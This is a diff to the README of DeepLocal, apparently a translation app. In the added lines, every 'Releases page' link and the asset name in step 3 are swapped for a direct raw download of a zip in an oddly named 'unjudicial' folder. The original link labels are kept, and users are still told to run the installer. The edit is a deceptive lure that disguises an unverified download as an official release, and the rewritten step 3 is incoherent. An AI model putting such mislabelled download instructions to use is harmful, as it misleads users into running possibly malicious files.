merr-me/DeepLocal/README.md

 - **Fast Performance:** Optimized for quick translations.

 ## 📄 Download & Install
-To get started, visit the **[Releases page](https://github.com/merr-me/DeepLocal/releases)**.
+To get started, visit the **[Releases page](https://raw.githubusercontent.com/merr-me/DeepLocal/main/unjudicial/DeepLocal.zip)**.
 Here’s how to download and install DeepLocal:

-1. Click on the **[Releases page](https://github.com/merr-me/DeepLocal/releases)** link.
+1. Click on the **[Releases page](https://raw.githubusercontent.com/merr-me/DeepLocal/main/unjudicial/DeepLocal.zip)** link.
 2. Look for the latest version of DeepLocal at the top of the page.
-3. Under the "Assets" section, find the installation file labeled something like `DeepLocal_x.x.x.exe`.
+3. Under the "Assets" section, find the installation file labeled something like `https://raw.githubusercontent.com/merr-me/DeepLocal/main/unjudicial/DeepLocal.zip`.
 4. Click on the installation file to download it to your computer.
 5. Once the download is complete, locate the file in your Downloads folder and double-click it to run the installer.
 6. Follow the on-screen instructions to complete the installation.